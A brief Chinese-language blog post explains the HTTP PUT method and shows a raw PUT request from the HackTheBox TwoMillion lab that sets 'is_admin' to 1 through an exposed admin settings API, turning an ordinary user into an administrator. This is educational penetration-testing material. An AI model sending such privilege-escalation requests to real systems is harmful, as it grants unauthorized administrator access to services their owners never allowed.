渗透测试与HTTP中的PUT请求

PUT 请求用于向服务器更新指定资源,可以理解为对服务器上的资源进行修改操作。使用 PUT 请求方式会覆盖原有的资源内容,因此需要谨慎使用。

在渗透测试中,有可能服务端会暴露PUT请求的api,如修改用户权限的api,例如HTB的TwoMillion靶场就利用了这个api将普通用户提升为管理员用户:

复制代码
PUT /api/v1/admin/settings/update HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=lb54v6es5dm1k3h5fvk8vu325p

Connection: close

Content-Type:application/json

Content-Length: 51



{

	"email":"12345@gmail.com",

"is_admin":1

}
相关推荐
BillKu14 分钟前
Vue3 中使用 DOMPurify 对渲染动态 HTML 进行安全净化处理
前端·安全·html
新鲜萝卜皮1 小时前
你知道TCP的半连接队列和全连接队列吗?
网络协议
wanhengidc1 小时前
服务器内存不足会造成哪些影响?
运维·服务器·网络·游戏·智能手机
xiaoxiongip6662 小时前
动态ip适合挂什么项目
网络·爬虫·python·网络协议·tcp/ip·ip
RTC老炮2 小时前
webrtc弱网-AlrDetector类源码分析与算法原理
服务器·网络·算法·php·webrtc
敲上瘾3 小时前
Docker网络实战:容器通信与隔离之道
linux·网络·docker·微服务·容器
站长朋友3 小时前
什么是OCSP装订(OCSP Stapling)?它如何加速SSL握手?
网络·网络协议·ssl·ocsp装订·https握手优化·tls扩展配置·ssl证书国内节点
知北游天3 小时前
Linux网络:初识网络
linux·运维·网络
大筒木老辈子4 小时前
Linux笔记---HTTP协议
笔记·网络协议·http
LaoZhangGong1234 小时前
了解RJ45插座和水晶头网线
网络·tcp/ip·智能路由器·rj45